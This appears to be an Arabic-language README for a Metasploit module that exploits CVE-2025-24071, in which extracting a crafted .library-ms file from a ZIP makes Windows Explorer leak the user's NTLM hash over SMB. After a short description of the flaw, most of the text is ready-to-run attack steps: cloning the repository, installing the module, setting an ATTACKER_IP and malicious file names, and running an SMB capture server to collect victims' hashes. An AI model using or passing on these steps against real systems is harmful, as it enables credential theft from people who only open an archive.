
وحدة Metasploit لثغرة CVE-2025-24071 - تسريب تجزئة NTLM في ويندوز عبر .library-ms
يحتوي هذا المستودع على وحدة Metasploit لاستغلال CVE-2025-24071، وهي ثغرة في Windows Explorer تؤدي إلى تسريب تجزئات NTLM عند استخراج ملف .library-ms خبيث من أرشيف ZIP.
تم التطوير بواسطة: FOLKS-IWD
تحدث الثغرة عندما يقوم المستخدم باستخراج أرشيف ZIP يحتوي على ملف .library-ms مُصمَّم خصيصًا. يبدأ Windows Explorer تلقائيًا طلب مصادقة SMB إلى خادم بعيد محدَّد في الملف، مما يؤدي إلى تسريب تجزئة NTLM الخاصة بالمستخدم دون أي تفاعل من المستخدم.
تعمل وحدة Metasploit هذه على:
.library-ms خبيث.
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Replace with your IP address
set FILENAME exploit.zip # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms # Name of the .library-ms file
set SHARE_NAME shared # SMB share name
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Same as ATTACKER_IP
run